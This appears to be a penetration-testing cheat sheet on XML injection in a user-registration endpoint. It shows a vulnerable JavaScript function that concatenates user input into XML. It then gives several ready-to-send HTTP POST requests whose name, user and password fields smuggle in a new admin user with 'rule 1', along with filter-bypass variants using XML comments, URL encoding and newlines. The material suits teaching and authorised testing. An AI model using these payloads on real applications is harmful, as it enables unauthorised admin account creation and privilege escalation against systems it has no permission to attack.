Insert XML payloads in each parameter until you receive an XML error such as <test>
XML declaration allowed only at the start of the document
Now search for ways to build the XML structure to use to your advantage such as JS files and other payloads etc.
function WSregister__old() {​var name = document.getElementById("name").value;var username = document.getElementById("user").value;var password = document.getElementById("password").value;​var xml = '<?xml version="1.0" encoding="utf-8"?> ';xml += '<user> ';xml += ' <rule>2</rule> ';xml += ' <name>' + name + '</name> ';xml += ' <username>' + username + '</username> ';xml += ' <password>' + password + '</password> ';xml += '</user> ';​$.ajax({
Capture a request and modify the parameter to inject a new user with "rule 1" and see if you can elevate your account.
POST /add_new.php HTTP/1.1Host: Vulnerable.hostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 109Connection: close​name=user1&user=user1</username></user><user><rule>1</rule><name>admin</name><username>admin&password=password
If the application strips some of the characters consider a double injection and URL encoding the payload. Or try submitting it via the application instead
name: </name></user><user><rule>1<!--username: --></rule><name>admin1</name><username>admin1password: pentest
POST /add_new.php HTTP/1.1Host: vulnerable.hostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 138Connection: close​name=%3C%2Fname%3E%3C%2Fuser%3E%3Cuser%3E%3Crule%3E1%3C!--&user=--%3E%3C%2Frule%3E%3Cname%3Ea%3C%2Fname%3E%3Cusername%3Ea&password=pentest
The check may be case-insensitive, and furthermore it seems that spaces and tabs may be ignored between the tag name and the close tag character but, if we inject a new line it is not filtered!
Try adding new lines to see if they still work:
POST /add_new.php HTTP/1.1Host: vulnerable.hostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: vulnerable.hostContent-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestContent-Length: 84Connection: close​name=</name></user><user><rule>1<!--&user=--></rule><username>l33t&password=1337
​